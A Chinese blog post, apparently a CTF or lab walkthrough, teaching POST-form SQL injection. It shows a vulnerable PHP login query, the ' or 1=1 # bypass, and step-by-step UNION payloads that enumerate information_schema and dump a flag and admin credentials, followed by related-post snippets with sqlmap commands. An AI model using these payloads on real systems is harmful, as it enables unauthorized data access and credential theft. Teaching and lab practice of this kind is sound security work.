POST注入

最新推荐文章于 2024-05-21 08:03:35 发布
最新推荐文章于 2024-05-21 08:03:35 发布
阅读量1.6k 收藏 3
点赞数 3
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45790675/article/details/109258131
版权

POST注入

一、POST注入介绍

注入攻击的本质是把用户输入的数据当做代码执行,POST注入一般会在表单的地方。
1.有两个关键条件:
①用户能够控制输入
②原本程序要执行的代码拼接了用户输入的数据
2.POST注入高危点:
登录框
查询框
各种和数据库有交互的框
3.最经典的POST注入莫过于万能密码:
’or 1=1 #
万能密码就是引出注入手法,你在登录的时候输入什么都能登录

二、例题

例如第一题
首先在这里插入图片描述
首先我们查看源码在这里插入图片描述

$sql = 'select *from user where username =\''.$username.'\' and password=\''.$password.'\'';
$result = mysqli_query($conn,$sql);

我们会发现直接执行了sql的拼接语句,中间没有任何过滤,所以判断存在SQL注入,所以我们用’闭合$username前的内容,同时注释掉后面的内容,达到和数据库建立连接

'or 1=1 #

select * from user where username='' or 1=1 #
查询user表中username为空的值,或者1=1的值,1=1恒成立所以无论输入什么都会有数据显示

所以第一步我们先用万能密码’or 1=1 #发现存在POST注入
在这里插入图片描述
第二步用order by查字段数

1' or 1=1 order by 1 #
1' or 1=1 order by 2 #
1' or 1=1 order by 3 #

order by 4时结果显示错误,判断有三个字段在这里插入图片描述
第三步判断回显点

'union select 1 #
'union select 1,2 #
'union select 1,2,3 #

得到回显点是2和3
在这里插入图片描述

第四步,我们用database()查询数据库名

'union select 1,2,database() #

得出库名post_error
在这里插入图片描述
第五步查表名

'union select 1,2,table_name from information_schema.tables where table_schema="post_error" limit 0,1#

得出表名flag,user
在这里插入图片描述
在这里插入图片描述
第六步我们查字段名

'union select 1,2,column_name from information_schema.columns where table_name='flag' limit 0,1#
...
'union select 1,2,column_name from information_schema.columns where table_name='user' limit 1,1#

'union select 1,2,column_name from information_schema.columns where table_name='user' limit 0,1#

flag表中字段:id,flag
user表中字段:id,username,password
在这里插入图片描述
在这里插入图片描述
第七步我们来查表中数据
将字段依次输入

'union select 1,2,flag from flag limit 0,1#

'union select 1,2,username from user limit 0,1#

查询结果分别为:id from flag-> 1,2,3
flag from flag-> zKaQ-PostK1,zKaQ-XZT,zKaQ-FlagA1
username from user->admin
password from user->as4dsa2dsad2a3

在这里插入图片描述
在这里插入图片描述
成功找到flage为zKaQ-PostK1
在这里插入图片描述

Monkey:
关注
  • 3
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
【超详细】POST注入(Less-11)、Cookie注入(Less-20)、二次注入(Less-24)、宽字节注入(Less-32)
lyy0xfff的博客
07-09 491
需要知道的一些知识: 所谓POST注入指的是我们往常传递参数的时候,在地址栏都可以看到 我们输入参数的具体值,但POST方式提交的特点就是,所提交的数据 不会在地址栏上显示。 这就需要我们对传递过来的数据进行抓包,通过拦截从而来修改我们 提交的数据,起到POST注入的效果。 0x01 首先我们根据题意,输入一个用户名和密码,系统显示你的用户名和你的密码(蓝字,可能看不请), 并且提示你成功登录 0x02 然后我们看到它的SQL语句后面的where条件存在单引号,然后我们联想到单引号注入,所以我们试试对us
渗透测试:详解sqlmap进行POST注入、基于insert的注入(以vulnhub靶机LampSecurity:CTF7为例)
Bossfrank的博客
06-22 4646
本文以vulnhub靶机LampSecurity:CTF7为例,详解了insert(非select)类型的SQL注入方法,包含对报错注入函数updatexml的使用。同时还详解了使用sqlmap进行POST类型注入的方法。
SQL注入post注入
最新发布
banliyaoguai的博客
05-21 799
GET请求的参数是通过URL传输的,而URL的长度往往被浏览器所限制,通常为2048个字符,因此GET请求的参数传输长度是被限制的。GET请求可以被缓存,因为GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,可以使用缓存来提高性能。POST请求不是幂等的,多次相同的POST请求会对服务器的状态产生影响,可能会改变服务器的数据。GET请求是幂等的,即多次相同的GET请求对服务器的状态没有影响,不会改变服务器的数据。GET请求通过URL的请求行来提交数据,这些数据在URL中是可见的。
SQL注入原理-POST注入
T1ngSh0w的博客
09-17 4900
SQL注入原理-POST注入
post注入
quan9i的博客
01-04 5146
post注入sql-lab11-18)
POST注入--万能密码(zkaq)
weixin_74410605的博客
07-12 1016
入门简单的sql注入中的post注入,一键学会万能密码
利用sqlmap进行POST注入
热门推荐
lwpoor123的博客
12-24 12万+
利用sqlmap进行POST注入,常见的有三种方法: 注入方式一: 1.用Burp抓包,然后保存抓取到的内容。例如:保存为post.txt,然后把它放至某个目录下 2.列数据库: sqlmap.py -r "c:\Users\fendo\Desktop\post.txt" -p n --dbs 注:-r表示加载一个文件,-p指定参数 其中出现了三次提示: it looks l...
SQL注入——POST HEAD注入
weixin_74991270的博客
10-10 227
熟练掌握POST、HEAD注入的步骤手工注入和工具联合使用更优秀。
sql注入 pikachu post数字型注入
08-12
SQL 注入 Pikachu Post 数字型注入 SQL 注入是一种常见的 Web 应用安全漏洞,攻击者可以通过在输入字段中注入恶意的 SQL 语句来获取或修改敏感数据。在本文中,我们将探讨一种新的 Post 数字型注入方法,即使用 ...
php中$_GET与$_POST过滤sql注入的方法
01-21
本文实例讲述了php中$_GET与$_POST过滤sql注入的方法,分享给大家供大家参考。具体分析如下: 此函数只能过滤一些敏感的sql命令了,像id=1这种大家还是需要自己简单过滤了。 主要实现代码如下: 复制代码 代码如下:...
第十二节 POST update语句注入-01
09-15
"POST update语句注入" 在数据库安全领域中,SQL 注入是一种常见的攻击方式,而在 Web 应用程序中,POST 请求也可能存在 SQL 注入漏洞。今天我们将讨论 POST update 语句注入的相关知识点。 MySQL update 介绍 ...
SQLMAP的注入使用
05-13
该命令用于判断目标网站是否存在POST注入漏洞。 GET注入详解: * python sqlmap.py -u "xxxxxxx.com" --dbs 【获取数据库内所有数据库的名称】 该命令用于获取目标网站的所有数据库的名称。 * python sqlmap.py...
post表单防止注入
01-22
post表单,这个不知道大家会不会,传上来分享一下,呵呵
POST注入(一)
qq_45300786的博客
07-04 8995
POST(一) 注入环境:http://inject2.lab.aqlab.cn:81/Pass-05/index.php 攻击流程:     1;判断是否存在sql注入漏洞。     2;判断网页存在字段数。     3;判断回显点。     4;获取信息。   测试开始:     测试目标获取管理员账号密码 GET/POST 区别: GET传参的数据有限,比较少 POST传参的数据可以比较大 可以达到很多效果 —— 文件上传 GET传参会经过URL编码 POST不会URL编码,比如注释符号:#的UR
渗透测试基础-POST注入
weixin_45488495的博客
04-08 2106
渗透测试基础-POST注入POST注入是什么POST注入靶场演练漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! POST注入是什么 post是一种传参方式,大多出现在各种框处,比如登录框,查询框,和各种与数据库有交互的框。 注入攻击是:用户输入的数据当作代码执行,这里有两个关键点 关键点一:用户能够控制输入 关键点二:原本程序要执行的代码,拼接了用户输入的数据 post注入与get注入没有本质的区别,无非就是一个在表单框执
sql注入--POST注入
pakho_C的博客
01-04 4361
sql注入POST注入 靶场:sqli-labs-master 下载链接:靶场下载链接 POST和GET的区别 GET提交的数据会显示在URL中,POST则不会。这是最显而易见的差别。这点意味着GET更不安全(POST也不安全,因为HTTP是明文传输抓包就能获取数据内容,要想安全还得加密) GET回退浏览器无害,POST会再次提交请求(GET方法回退后浏览器再缓存中拿结果,POST每次都会创建新资源) GET提交的数据大小有限制(是因为浏览器对URL的长度有限制,GET本身没有限制),POST没有 GET
sqlmap post注入方法
09-20
sqlmap是一种常用的自动化SQL注入工具,可以用于测试和发现应用程序中的SQL注入漏洞。在使用post注入方法时,可以通过以下步骤进行操作: 1. 使用`-u`参数指定目标URL,例如:`-u "http://xxx.xxx.com/Login.asp"` 2. 使用`--data`参数指定POST请求的数据,例如:`--data "n=1&p=1"` 3. 输入命令`sqlmap -u http://xxx.xxx.com/Login.asp --data "n=1&p=1"`来执行注入攻击 请注意,这只是一个简单的示例,实际使用时可能需要根据具体情况进行参数的调整。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值